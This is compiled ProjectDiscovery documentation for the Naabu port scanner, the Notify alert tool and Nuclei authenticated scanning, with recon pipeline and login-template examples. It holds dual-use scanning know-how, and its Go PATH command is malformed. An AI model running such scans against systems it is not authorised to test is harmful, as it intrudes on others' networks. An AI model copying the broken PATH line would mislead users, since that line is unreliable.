https://github.com/projectdiscovery/naabu/releases/
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* Naabu requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export $PATH=$PATH:$HOME/go/bin >> $home/.bashrc
source $home/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/naabu`
# Naabu Overview
Source: https://docs.projectdiscovery.io/tools/naabu/overview
A Go-based port scanning tool to quickly enumerate valid ports
# What is **Naabu?**
Naabu is a port scanning tool written in Go that enumerates valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT/UDP scans on the host or list of hosts and provides all ports that return a reply.
## Features and capabilities
* Fast And Simple **SYN/CONNECT/UDP** probe based scanning
* Optimized for ease of use and **lightweight** on resources
* **DNS** Port scan
* **Automatic IP Deduplication** for DNS port scan
* **IPv4/IPv6** Port scan (**experimental**)
* **Passive** Port enumeration using Shodan [Internetdb](https://internetdb.shodan.io)
* **Host Discovery** scan (**experimental**)
* **NMAP** integration for service discovery
* Multiple input support - **STDIN/HOST/IP/CIDR/ASN**
* Multiple output format support - **JSON/TXT/STDOUT**
## Additional Naabu Resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
ProjectDiscovery’s httpx should not be confused with the httpx python library.Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://mrshan.medium.com/naabu-port-scanner-why-you-should-use-it-947d8ca025df](https://mrshan.medium.com/naabu-port-scanner-why-you-should-use-it-947d8ca025df)
* [https://highon.coffee/blog/naabu-cheat-sheet/](https://highon.coffee/blog/naabu-cheat-sheet/)
## Support
Questions about using Naabu? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Naabu
Source: https://docs.projectdiscovery.io/tools/naabu/running
Learn about running Naabu with examples and sample output
For all of the flags and options available for `naabu` be sure to check out the [Usage](/tools/naabu/usage) page. On this page we'll share examples running httpx with specific flags and goals
and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
# Running Naabu
To run the tool on a target, just use the following command.
```sh
naabu -host hackerone.com
```
This will run the tool against hackerone.com. There are a number of configuration options that you can pass along with this command. The verbose switch `-v` can be used to display verbose information.
```console
naabu -host hackerone.com
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.3
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running SYN scan with root privileges
[INF] Found 4 ports on host hackerone.com (104.16.100.52)
hackerone.com:80
hackerone.com:443
hackerone.com:8443
hackerone.com:8080
```
The ports to scan for on the host can be specified via `-p` parameter (udp ports must be expressed as `u:port`). It takes nmap format ports and runs enumeration on them.
```sh
naabu -p 80,443,21-23,u:53 -host hackerone.com
```
By default, the Naabu checks for nmap's `Top 100` ports. It supports the following in-built port lists -
| Flag | Description |
| ----------------- | ------------------------------------ |
| `-top-ports 100` | Scan for nmap top **100** port |
| `-top-ports 1000` | Scan for nmap top **1000** port |
| `-p - ` | Scan for full ports from **1-65535** |
You can also specify specific ports which you would like to exclude from the scan.
```sh
naabu -p - -exclude-ports 80,443
```
To run the naabu on a list of hosts, `-list` option can be used.
```sh
naabu -list hosts.txt
```
To run the naabu on a ASN, AS input can be used. It takes the IP address available for given ASN and runs the enumeration on them.
```console
echo AS14421 | naabu -p 80,443
216.101.17.249:80
216.101.17.249:443
216.101.17.248:443
216.101.17.252:443
216.101.17.251:80
216.101.17.251:443
216.101.17.250:443
216.101.17.250:80
```
You can also get output in json format using `-json` switch. This switch saves the output in the JSON lines format.
```console
naabu -host 104.16.99.52 -json
{"ip":"104.16.99.52","port":443}
{"ip":"104.16.99.52","port":80}
```
The ports discovered can be piped to other tools too. For example, you can pipe the ports discovered by naabu to [httpx](https://github.com/projectdiscovery/httpx) which will then find running http servers on the host.
```console
echo hackerone.com | naabu -silent | httpx -silent
http://hackerone.com:8443
http://hackerone.com:443
http://hackerone.com:8080
http://hackerone.com:80
```
The speed can be controlled by changing the value of `rate` flag that represent the number of packets per second. Increasing it while processing hosts may lead to increased false-positive rates. So it is recommended to keep it to a reasonable amount.
# IPv4 and IPv6
Naabu supports both IPv4 and IPv6. Both ranges can be piped together as input. If IPv6 is used, connectivity must be correctly configured, and the network interface must have an IPv6 address assigned (`inet6`) and a default gateway.
```console
echo hackerone.com | dnsx -resp-only -a -aaaa -silent | naabu -p 80 -silent
104.16.99.52:80
104.16.100.52:80
2606:4700::6810:6434:80
2606:4700::6810:6334:80
```
The option `-ip-version 6` makes the tool use IPv6 addresses while resolving domain names.
```console
echo hackerone.com | ./naabu -p 80 -ip-version 6
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.8
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[INF] Found 1 ports on host hackerone.com (2606:4700::6810:6334)
hackerone.com:80
```
To scan all the IPs of both version, `ip-version 4,6` can be used along with `-scan-all-ips` flag.
```console
echo hackerone.com | ./naabu -iv 4,6 -sa -p 80 -silent
[INF] Found 1 ports on host hackerone.com (104.16.100.52)
hackerone.com:80
[INF] Found 1 ports on host hackerone.com (104.16.99.52)
hackerone.com:80
[INF] Found 1 ports on host hackerone.com (2606:4700::6810:6334)
hackerone.com:80
[INF] Found 1 ports on host hackerone.com (2606:4700::6810:6434)
hackerone.com:80
```
# Host Discovery
Naabu optionally supports multiple options to perform host discovery, as outlined below. Host discovery is completed automatically before beginning a connect/syn scan if the process has enough privileges. `-sn` flag instructs the toll to perform host discovery only. `-Pn` flag skips the host discovery phase. Host discovery is completed using multiple internal methods; one can specify the desired approach to perform host discovery by setting available options.
Available options to perform host discovery:
* **ARP** ping (`-arp`)
* TCP **SYN** ping (`-ps 80`)
* TCP **ACK** ping (`-pa 443`)
* ICMP **echo** ping (`-pe`)
* ICMP **timestamp** ping (`-pp`)
* ICMP **address mask** ping (`-pm`)
* IPv6 **neighbor discovery** (`-nd`)
# Configuration file
Naabu supports config file as default located at `$HOME/.config/naabu/config.yaml`, It allows you to define any flag in the config file and set default values to include for all scans.
# Nmap integration
We have integrated nmap support for service discovery or any additional scans supported by nmap on the found results by Naabu, make sure you have `nmap` installed to use this feature.
To use,`nmap-cli` flag can be used followed by nmap command, for example:-
```console
echo hackerone.com | naabu -nmap-cli 'nmap -sV -oX nmap-output'
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.0
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running TCP/ICMP/SYN scan with root privileges
[INF] Found 4 ports on host hackerone.com (104.16.99.52)
hackerone.com:443
hackerone.com:80
hackerone.com:8443
hackerone.com:8080
[INF] Running nmap command: nmap -sV -p 80,8443,8080,443 104.16.99.52
Starting Nmap 7.01 ( https://nmap.org ) at 2020-09-23 05:02 UTC
Nmap scan report for 104.16.99.52
Host is up (0.0021s latency).
PORT STATE SERVICE VERSION
80/tcp open http cloudflare
443/tcp open ssl/https cloudflare
8080/tcp open http-proxy cloudflare
8443/tcp open ssl/https-alt cloudflare
```
# CDN/WAF Exclusion
Naabu also supports excluding CDN/WAF IPs being port scanned. If used, only `80` and `443` ports get scanned for those IPs. This feature can be enabled by using `exclude-cdn` flag.
Currently `cloudflare`, `akamai`, `incapsula` and `sucuri` IPs are supported for exclusions.
# Scan Status
Naabu exposes json scan info on a local port bound to localhost at `http://localhost:63636` (the port can be changed via the `-metrics-port` flag)
# Using naabu as library
The following sample program scan the port `80` of `scanme.sh`. The results are returned via the `OnResult` callback:
```go
package main
import (
"log"
"github.com/projectdiscovery/goflags"
"github.com/projectdiscovery/naabu/v2/pkg/result"
"github.com/projectdiscovery/naabu/v2/pkg/runner"
)
func main() {
options := runner.Options{
Host: goflags.StringSlice{"scanme.sh"},
ScanType: "s",
OnResult: func(hr *result.HostResult) {
log.Println(hr.Host, hr.Ports)
},
Ports: "80",
}
naabuRunner, err := runner.NewRunner(&options)
if err != nil {
log.Fatal(err)
}
defer naabuRunner.Close()
naabuRunner.RunEnumeration()
}
```
# Naabu Usage
Source: https://docs.projectdiscovery.io/tools/naabu/usage
Review Naabu usage including flags, configs, and optimization
## Access Help
Use `naabu - h` to display all help options.
## Naabu Help Options
```yaml
Usage:
./naabu [flags]
INPUT:
-host string[] hosts to scan ports for (comma-separated)
-list, -l string list of hosts to scan ports (file)
-exclude-hosts, -eh string hosts to exclude from the scan (comma-separated)
-exclude-file, -ef string list of hosts to exclude from scan (file)
PORT:
-port, -p string ports to scan (80,443, 100-200)
-top-ports, -tp string top ports to scan (default 100) [full,100,1000]
-exclude-ports, -ep string ports to exclude from scan (comma-separated)
-ports-file, -pf string list of ports to scan (file)
-port-threshold, -pts int port threshold to skip port scan for the host
-exclude-cdn, -ec skip full port scans for CDN/WAF (only scan for port 80,443)
-display-cdn, -cdn display cdn in use
RATE-LIMIT:
-c int general internal worker threads (default 25)
-rate int packets to send per second (default 1000)
UPDATE:
-up, -update update naabu to latest version
-duc, -disable-update-check disable automatic naabu update check
OUTPUT:
-o, -output string file to write output to (optional)
-j, -json write output in JSON lines format
-csv write output in csv format
CONFIGURATION:
-scan-all-ips, -sa scan all the IP's associated with DNS record
-ip-version, -iv string[] ip version to scan of hostname (4,6) - (default 4)
-scan-type, -s string type of port scan (SYN/CONNECT) (default "s")
-source-ip string source ip and port (x.x.x.x:yyy)
-interface-list, -il list available interfaces and public ip
-interface, -i string network Interface to use for port scan
-nmap invoke nmap scan on targets (nmap must be installed) - Deprecated
-nmap-cli string nmap command to run on found results (example: -nmap-cli 'nmap -sV')
-r string list of custom resolver dns resolution (comma separated or from file)
-proxy string socks5 proxy (ip[:port] / fqdn[:port]
-proxy-auth string socks5 proxy authentication (username:password)
-resume resume scan using resume.cfg
-stream stream mode (disables resume, nmap, verify, retries, shuffling, etc)
-passive display passive open ports using shodan internetdb api
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-no-stdin Disable Stdin processing
HOST-DISCOVERY:
-sn, -host-discovery Perform Only Host Discovery
-Pn, -skip-host-discovery Skip Host discovery
-ps, -probe-tcp-syn string[] TCP SYN Ping (host discovery needs to be enabled)
-pa, -probe-tcp-ack string[] TCP ACK Ping (host discovery needs to be enabled)
-pe, -probe-icmp-echo ICMP echo request Ping (host discovery needs to be enabled)
-pp, -probe-icmp-timestamp ICMP timestamp request Ping (host discovery needs to be enabled)
-pm, -probe-icmp-address-mask ICMP address mask request Ping (host discovery needs to be enabled)
-arp, -arp-ping ARP ping (host discovery needs to be enabled)
-nd, -nd-ping IPv6 Neighbor Discovery (host discovery needs to be enabled)
-rev-ptr Reverse PTR lookup for input ips
OPTIMIZATION:
-retries int number of retries for the port scan (default 3)
-timeout int millisecond to wait before timing out (default 1000)
-warm-up-time int time in seconds between scan phases (default 2)
-ping ping probes for verification of host
-verify validate the ports again with TCP verification
DEBUG:
-health-check, -hc run diagnostic check up
-debug display debugging information
-verbose, -v display verbose output
-no-color, -nc disable colors in CLI output
-silent display only results in output
-version display version of naabu
-stats display stats of the running scan (deprecated)
-si, -stats-interval int number of seconds to wait between showing a statistics update (deprecated) (default 5)
-mp, -metrics-port int port to expose nuclei metrics on (default 63636)
```
# Notes on Usage
* Naabu allows arbitrary binary execution as a feature to support [nmap integration](https://github.com/projectdiscovery/naabu#nmap-integration).
* Naabu is designed to scan ports on multiple hosts / mass port scanning.
* Naabu is configured by default with that assumption that you are running it from VPS.
* We suggest tuning the flags / rate if running Naabu from local system.
* For best results, run Naabu as **root** user.
# Notify Install
Source: https://docs.projectdiscovery.io/tools/notify/install
Learn how to install Notify and get started
Enter the command below in a terminal to install uncover using Go.
```bash
go install -v github.com/projectdiscovery/notify/cmd/notify@latest
```
## Installation Notes
* Notify requires the latest version of [**Go**](https://go.dev/doc/install)
# Notify Overview
Source: https://docs.projectdiscovery.io/tools/notify/overview
A Go-based package to streamline and publish output of tools to multiple locations
Notify is a Go-based package designed to streamline the process of monitoring the output from various tools or files. It enables users to pipe this output directly and publish it to a selection of supported platforms.
## Overview
Notify is highly versatile, serving as a crucial link in automating the notification process across different communication platforms, thereby enhancing the efficiency of monitoring and reporting in security operations, development workflows, or any scenario requiring real-time alerts based on tool outputs or file changes
Check out [the GitHub repo here](https://github.com/projectdiscovery/notify).
## Features
* Support for File / Pipe input
* Support Line by Line / Bulk Post
* Support using Single / Multiple providers
* Support for custom Web-hooks
* Support custom data formatting
### Supported Tools
* Slack
* Discord
* Telegram
* Pushover
* Email
* Microsoft Teams
* Google Chat
## Support
Questions about using Notify? Issues working through installation? Cool story or use case you want to share? Get in touch!
Reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Notify Provider Config
Source: https://docs.projectdiscovery.io/tools/notify/provider-config
Learn how to set up Notify's provider configuration
The default provider config file can be created at `$HOME/.config/notify/provider-config.yaml`.
Each provider (`slack`, `discord`, etc.) is specified at the top level by name, and then can have 1 to many configurations for that provider identifed by a unique `id` field.
## Slack
**Fields:**
* `slack_channel`: The Slack channel to post to
* `slack_username`: The name of the bot to post as
* `slack_format`: By default just `{{data}}` but you can specify more formattiong details
* `slack_webhook_url`: The URL for the Slack integration webhook (See [Slack help for more information](https://slack.com/help/articles/115005265063-Incoming-webhooks-for-Slack))
**Example:**
```yaml
slack:
- id: "slack"
slack_channel: "recon"
slack_username: "test"
slack_format: "{{data}}"
slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"
- id: "vulns"
slack_channel: "vulns"
slack_username: "test"
slack_format: "{{data}}"
slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"
```
## Discord
```yaml
discord:
- id: "crawl"
discord_channel: "crawl"
discord_username: "test"
discord_format: "{{data}}"
discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"
- id: "subs"
discord_channel: "subs"
discord_username: "test"
discord_format: "{{data}}"
discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"
```
## Telegram
```yaml
telegram:
- id: "tel"
telegram_api_key: "XXXXXXXXXXXX"
telegram_chat_id: "XXXXXXXX"
telegram_format: "{{data}}"
telegram_parsemode: "Markdown" # None/Markdown/MarkdownV2/HTML (https://core.telegram.org/bots/api#formatting-options)
```
## Pushover
```yaml
pushover:
- id: "push"
pushover_user_key: "XXXX"
pushover_api_token: "YYYY"
pushover_format: "{{data}}"
pushover_devices:
- "iphone"
```
## Email (SMTP)
```yaml
smtp:
- id: email
smtp_server: mail.example.com
smtp_username: test@example.com
smtp_password: password
from_address: from@email.com
smtp_cc:
- to@email.com
smtp_format: "{{data}}"
subject: "Email subject"
smtp_html: false
smtp_disable_starttls: false
```
## Google Chat
```yaml
googlechat:
- id: "gc"
key: "XXXXXXXX"
token: "XXXXXX"
space: "XXXXXX"
google_chat_format: "{{data}}"
```
## Microsoft Teams
```yaml
teams:
- id: "recon"
teams_webhook_url: "https://.webhook.office.com/webhookb2/xx@xx/IncomingWebhook/xx"
teams_format: "{{data}}"
```
## Gotify
```yaml
gotify:
- id: 'gotify'
gotify_host: 'XXXXXX'
gotify_port: '80'
gotify_token: 'XXXXXX'
gotify_format: '{{data}}'
gotify_disabletls: false
gotify_title: "recon"
```
## Custom Webhook
```yaml
custom:
- id: webhook
custom_webhook_url: http://host/api/webhook
custom_method: GET
custom_format: '{{data}}'
custom_headers:
Content-Type: application/json
X-Api-Key: XXXXX
custom:
- id: webhookJson
custom_webhook_url: http://host/api/webhook
custom_method: GET
custom_format: '{"text":{{dataJsonString}} }'
custom_headers:
Content-Type: application/json
X-Api-Key: XXXXX
custom:
- id: webhook
custom_webhook_url: http://host/api/webhook
custom_method: GET
custom_sprig: '{"text":"{{ .url }}"}'
custom_headers:
Content-Type: application/json
X-Api-Key: XXXXX
```
# Running Notify
Source: https://docs.projectdiscovery.io/tools/notify/running
Learn about running Notify with details om variables and examples
For all of the flags and options available for **Notify** be sure to check out the [Usage](/tools/notify/usage) page.
If you have questions, reach out to us through [Help](/help).
## Basic Usage
Notify supports piping output of any tool or output file and send it to configured provider/s (e.g, discord, slack channel) as notification.
### Send notification using piped(stdin) output
```sh
subfinder -d hackerone.com | notify -bulk
```
![image](https://user-images.githubusercontent.com/8293321/130240854-e3031bc6-ecc8-47f8-9654-4c58e09cc622.png)
### Send notification using output file
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt
```
### Send notification using output file in bulk mode
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt -bulk
```
### Send notification using output file to specific provider's
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt -bulk -provider discord,slack
```
### Send notification using output file to specific ID's
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt -bulk -id recon,vulns,scan
```
## Example Uses
Following command will enumerate subdomains using [SubFinder](https://github.com/projectdiscovery/subfinder) and probe alive URLs using [httpx](https://github.com/projectdiscovery/httpx), runs [Nuclei](https://github.com/projectdiscovery/nuclei) templates and send the nuclei results as a notifications to configured provider/s.
```sh
subfinder -d intigriti.com | httpx | nuclei -tags exposure -o output.txt; notify -bulk -data output.txt
```
## Provider Config
The tool tries to use the default provider config (`$HOME/.config/notify/provider-config.yaml`), it can also be specified via CLI by using **provider-config** flag.
To run the tool with custom provider config, just use the following command.
```sh
notify -provider-config providers.yaml
```
## Notify Config
Notify flags can be configured at default config (`$HOME/.config/notify/config.yaml`) or custom config can be also provided using `config` flag.
## Notes
* As default notify sends notification line by line
* Use `-bulk` to send notification as entire message/s (messages might be chunked)
## References
* [Creating Slack webhook](https://slack.com/intl/en-it/help/articles/115005265063-Incoming-webhooks-for-Slack)
* [Creating Discord webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks)
* [Creating Telegram bot](https://core.telegram.org/bots#3-how-do-i-create-a-bot)
* [Creating Pushover Token](https://github.com/containrrr/shoutrrr/blob/main/docs/services/pushover.md)
Notify is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team.
# Notify Usage
Source: https://docs.projectdiscovery.io/tools/notify/usage
Learn Notify usage including flags and filters
## Access help
Use `notify -h` to display all of the help options.
## Notify options
| Flag | Description | Example |
| ----------------------- | -------------------------------------------------- | ------------------------------------- |
| `-bulk` | enable bulk processing | `notify -bulk` |
| `-char-limit` | max character limit per message (default 4000) | `notify -cl 2000` |
| `-config` | notify configuration file | `notify -config config.yaml` |
| `-data` | input file to send for notify | `notify -i test.txt` |
| `-delay` | delay in seconds between each notification | `notify -d 2` |
| `-id` | id to send the notification to (optional) | `notify -id recon,scans` |
| `-msg-format` | add custom formatting to message | `notify -mf Hey {{data}}` |
| `-no-color` | disable colors in output | `notify -nc` |
| `-provider-config` | provider config path | `notify -pc provider.yaml` |
| `-provider` | provider to send the notification to (optional) | `notify -p slack,telegram` |
| `-proxy` | http proxy to use with notify | `notify -proxy http://127.0.0.1:8080` |
| `-rate-limit` | maximum number of HTTP requests to send per second | `notify -rl 1` |
| `-silent` | enable silent mode | `notify -silent` |
| `-verbose` | enable verbose mode | `notify -verbose` |
| `-version` | display version | `notify -version` |
| `-update` | updates to latest version | `notify -update` |
| `-disable-update-check` | disables automatic update check | `notify -duc` |
# Authenticated Scans
Source: https://docs.projectdiscovery.io/tools/nuclei/authenticated-scans
Learn about scanning targets behind authentication with Nuclei
## What is an **Authenticated Scan** ?
There are some scenarios when running a Nuclei scan on a target might not be enough to find vulnerabilities. If a target is protected by login, then the scan will not be able to access those protected endpoints. This means vulnerabilities that are only accessible after logging in will not be found.
This is why authenticating with targets is important, before **Nuclei v3.2.0**, you could only authenticate by passing header in `-H` flag, but this limits the scope of authentication and is a not a scalable solution since authentication would need to be performed manually and the headers would need to be updated manually.
To solve this issue, Nuclei v3.2.0 introduces a **new specification for generic client side Authentication**, this allows apps like Nuclei to authenticate with targets using this format. We call this format `Secret File`, and it is managed through a YAML file that contains authentication related configuration.
This functionality is under development for other ProjectDiscovery Tools.
## Specification
Since authentication can be done in multiple ways, for example, using 3rd party services like OAuth, Custom Login , SSO , Bearer Auth and more - this specification categorizes authentication into two types: static authentication and dynamic authentication.
### Static Authentication
This approach involves a single, static secret that doesn't change frequently and serves as a direct indicator of an authenticated HTTP session. Examples include API Keys or credentials used in Basic Authentication (username and password).
### Dynamic Authentication
This method requires multiple, frequently changing secrets to manage a session. It's typical of processes like a social login or OAuth. In dynamic authentication, one set of credentials (for example: username and password) is used for the initial authentication, while additional elements (such as a session cookie or header) are employed to maintain the session's state.
### Dealing with Dynamic Authentication
Implementing and managing Static Authentication is easy, but dealing with Dynamic Authentication is a bit complex due to multiple entities and secrets and the flow of authentication being involved. Some might require a browser guided authentication while some might be achievable with auth flow.
A common solution for this is to capture and generate a login flow/sequence using a browser and then feed that script to app handling the authentication.\_createMdxContent
To focus on making this process easy, familiar, and scalable (users should be able to scan thousands of targets with authentication without much hassle), we leverage the existing rich ecosystem of `nuclei-templates`. These are written in YAML, are scalable, and comes with a powerful engine.
We achieve this scalability by reusing and extending our `default-login` templates library. We are continuously adding templates for different apps and services, and these templates can then be referenced in the `Secret File` to perform authentication.
### Scope of Authentication
It is recommended to send authentication-related data to only those targets that use and require them, instead of sharing them globally and risk leaking secrets to third parties.
To limit scope of a particular secret, we have introducd two fields `domains` & `domains-regex` (mutually exclusive) which can be used to limit the scope of a secret to a particular set of targets.
Use a wildcard like `.*` to send a secret to all targets. Only one secret can be used for a particular target, if multiple secrets are found for a target, the first one will be used with priority given to `domains` over `domains-regex`.
### Security & Storing Secret
We have not imposed the need to hardcode secrets in the `Secret File` configuration, and support the use of third-party secret management systems to templatize and manage secrets.
### Integrations with Secret Management Systems
We are currently exploring integrations with popular secret management systems for easy and secure management of secrets
We are prioritizng support for:
* **1Password**
* **Hashicorp Vault**
* **AWS Secrets Manager**
### Skipping Secret File
This feature is available in Nuclei **v3.3.1**.
If you provide a secret file to the Nuclei engine, it will automatically configure authentication or authorization for each request in the executed templates. In case you want to skip the secret configuration from the secret file and instead use hardcoded secrets or variables in specific templates, you can use the `skip-secret-file` *(bool)* option. By setting this property to **true**, Nuclei will not apply the secrets to each request in that templates.
**Example**
```yaml
variables:
username: foo
password: bar
http:
- raw:
- |
GET /some-restricted-page HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Authorization: Basic {{base64(concat(username, ":", password))}}
skip-secret-file: true
```
## Secret File Formats
YAML format of Secret File as of **Nuclei v3.2.0**:
```yaml
# static secrets
static:
# 1. Basic Auth based auth
- type: basicauth
domains:
- scanme.sh
username: test
password: test
# 2. API Key (via query parameters) based auth
- type: query
domains:
- example.com
params:
- key: token
value: 1a2b3c4d5e6f7g8h9i0j
# 3. Bearer Token based auth
- type: bearertoken
domains-regex:
- .*scanme.sh
- .*pdtm.sh
token: test
# 4. Custom Header based auth
- type: header
domains:
- api.projectdiscovery.io
- cve.projectdiscovery.io
- chaos.projectdiscovery.io
headers:
- key: x-pdcp-key
value:
# 5. Cookie based auth
- type: cookie
domains:
- scanme.sh
cookies:
- key: PHPSESSID
value: 1a2b3c4d5e6f7g8h9i0j
# raw: "PHPSESSID=1a2b3c4d5e6f7g8h9i0j" (an alternative way to specify cookie value)
# dynamic secrets
dynamic:
# A example dynamic login of Wordpress using REST API
- template: /path/to/wordpress-login.yaml
variables:
- key: username
value: pdteam
- key: password
value: nuclei-fuzz
input: auth-server.projectdiscovery.io # optional input/target, not required if target is hardcoded in template
# once login is successful, this can be used in below templatized static secret
type: cookie
domains:
- .*wp.*projectdiscovery.io
cookies:
- raw: "{{wp-global-cookie}}"
- raw: "{{wp-admin-cookie}}"
- raw: "{{wp-plugin-cookie}}"
# Note: This here (^) is a static secret in a templatized form
# so it can be any of the static secret type and not limited to just `cookie`.
```
## Secret File Fields
Here's a brief explaination of each field in the secret file:
### `type`
This field specifies the type of static secret being used and determines where the secret should be updated in the request. The following types are supported:
* `basicauth`: Basic Authentication
* `query`: Query Parameters
* `bearertoken`: Bearer Token
* `header`: Custom Header
* `cookie`: Cookie
### `domains`
This field is used to specify the domains for which the secret should be used. If the target domain matches any of the domains specified here, the secret will be used for that target. This field is mutually exclusive with `domains-regex` and can be used to limit the scope of a secret to a particular set of targets.
Example:
```yaml
domains:
- scanme.sh
- example.com
```
### `domains-regex`
This field is used to specify the domains for which the secret should be used using regex. If the target domain matches any of the regex specified here, the secret will be used for that target. This field is mutually exclusive with `domains` and can be used to limit the scope of a secret to a particular set of targets.
Example:
```yaml
domains-regex:
- .*projectdiscovery.io
- .*pdtm.sh
```
### `username` & `password`
These fields are used to specify the username and password for Basic Authentication and can only be used with `type: basicauth`.
Example:
```yaml
type: basicauth
domains:
- scanme.sh
username: test
password: test
```
### `params`
Params is a list of key-value pairs that are used to specify the query parameters for the request. This field can only be used with `type: query`.
Example:
```yaml
type: query
domains:
- example.com
params:
- key: token
value: 1a2b3c4d5e6f7g8h9i0j
```
### `token`
This field is used to specify the Bearer Token for the request and can only be used with `type: bearertoken`.
Example:
```yaml
type: bearertoken
domains-regex:
- .*scanme.sh
- .*pdtm.sh
token: 6f7g8h9i0j1a2b3c4d5e
```
### `headers`
Headers is a list of key-value pairs that are used to specify the custom headers for the request. This field can only be used with `type: header`.
Example:
```yaml
type: header
domains:
- api.projectdiscovery.io
- cve.projectdiscovery.io
- chaos.projectdiscovery.io
headers:
- key: x-pdcp-key
value:
```
### `cookies`
Cookies is a list of key-value pairs that are used to specify the cookies for the request. This field can only be used with `type: cookie`.
Example:
```yaml
type: cookie
domains:
- scanme.sh
cookies:
- key: PHPSESSID
value: 1a2b3c4d5e6f7g8h9i0j
# raw: "PHPSESSID=1a2b3c4d5e6f7g8h9i0j" (an alternative way to specify cookie value)
```
### `template`
`template` contains the absolute or relative path (of nuclei-templates directory) to the template file that will be used to authenticate with the target. This field can only be used with `type: dynamic`.
A template used for dynamic authentication should accept `variables` and optionally `input` as input, and should return the session data via extractor. The session data can then be used in the static secret.
Example:
In this example, a username and password are used to login to a Wordpress instance using REST API and the session data is exported via extractors.
```yaml
id: wordpress-login
info:
name: WordPress Login
author: pdteam
severity: info
description: |
WordPress Login template to use in workflows for authenticated wordpress testing.
tags: wordpress,login
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
part: header
words:
- '/wp-admin'
- 'wordpress_logged_in'
condition: and
extractors:
- type: regex
name: wp-plugin-cookie
part: header
internal: true
regex:
- "Set-Cookie: .+?; path=/wp-content/plugins; HttpOnly"
- type: regex
name: wp-admin-cookie
part: header
internal: true
regex:
- "Set-Cookie: .+?; path=/wp-admin; HttpOnly"
- type: regex
name: wp-global-cookie
part: header
internal: true
regex:
- "Set-Cookie: .+?; path=/; HttpOnly"
```
### `variables`
`variables` is a list of key-value pairs that are used to specify the variables for the template. This field can only be used with `type: dynamic` and is only required if the template requires variables.
Example:
```yaml
variables:
- key: username
value: pdteam
- key: password
value: nuclei-fuzz
```
### `input`
`input` is a optional input/target for the template to be executed on and is only required if the target is not hardcoded in the template. Specifying `input` here allows easy switching of dev and prod environments easily compared to hardcoding the target in the template.
Example:
```yaml
input: auth-server.projectdiscovery.io
```
# Nuclei FAQ
Source: https://docs.projectdiscovery.io/tools/nuclei/faq
Common questions and answers about Nuclei
If you have other issues to report we'd love to share those with the community. Please join our [Discord server](https://discord.gg/projectdiscovery), or reach out to us on [GitHub](https://github.com/projectdiscovery).
## General
Questions and answers on general topics for Nuclei.
Nuclei is a powerful open-source vulnerability scanner that is fast and customizable. It uses simple templates (YAML-based) that describe how to detect, prioritize, and remediate security vulnerabilities for the Nuclei scanning engine.
The two components, the [Nuclei engine](http://github.com/projectdiscovery/nuclei) - is the core of the project. It allows scripting HTTP / DNS / Network / Headless / File protocols based checks in a very simple to read-and-write YAML-based format.
The Nuclei [templates](http://github.com/projectdiscovery/nuclei-templates) - are custom-created or ready-to-use **community-contributed** vulnerability templates.
Nuclei was created to solve many of the limitations of traditional scanners, which always lacked the features to allow easy-to-write custom checks on top of their engine.
Nuclei was built with a focus on simplicity, modularity, and the ability to scale scanning for many assets.
Ultimately, we wanted to create something simple enough to be used by everyone with the complexity to integrate well with the intricacies of the modern technical stack.
Nuclei's features are implemented and tailored to allow rapid prototyping for complex security checks.
Nuclei is actively maintained and supported by ProjectDiscovery. In general, we release every two weeks and continue to refine, update, and expand Nuclei and its associated capabilities.
Our team also actively monitors for announcements about new CVEs, exploits, and other vulnerabilities to quickly provide a response to address those issues.
We recently released Nuclei v3, [read more about that release on our blog.](https://blog.projectdiscovery.io/nuclei-v3-featurefusion/)
Nuclei is open-source! The best way to support Nuclei is to contribute new templates.
In addition, we are always interested in hearing about how our community uses Nuclei to solve unique security problems and would love to discuss more.
If you want to share the process of a solution you found in walk-through on our blog, we are happy to publish your guest post on the [ProjectDiscovery blog](https://blog.projectdiscovery.io).
